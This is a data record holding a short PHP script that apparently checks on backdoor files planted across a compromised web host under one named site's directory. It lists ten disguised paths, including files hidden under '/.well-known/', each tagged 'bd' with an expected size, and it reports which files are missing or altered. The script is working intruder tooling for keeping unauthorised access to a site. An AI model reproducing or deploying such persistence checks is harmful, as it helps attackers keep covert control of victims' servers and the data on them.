{'id': 183207, 'code': 'Y2gQopBX
<?php $r = '/home/codecjfq/wms.codecraftsoftwares.com'; $x = ["/modules/sales/emailBugReport.order.php"=>"bd@@1475844@@1036",
"/warehouse/configuration.php"=>"bd@@1479189@@904",
"/inventory/busi.report03.php"=>"bd@@1479218@@974",
"/.well-known/pki-validation/pms_send.php"=>"bd@@1475903@@964",
"/database/list.tag.php"=>"bd@@1475942@@876",
"/config/comment.php"=>"bd@@1475973@@859",
"/modules/menu_lingua.php"=>"bd@@1479099@@918",
"/modules/warehouse/scheduler.order.php"=>"bd@@1475782@@945",
"/.well-known/nggshow.php"=>"bd@@1479121@@875",
"/public/busi.php"=>"bd@@1479157@@948"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');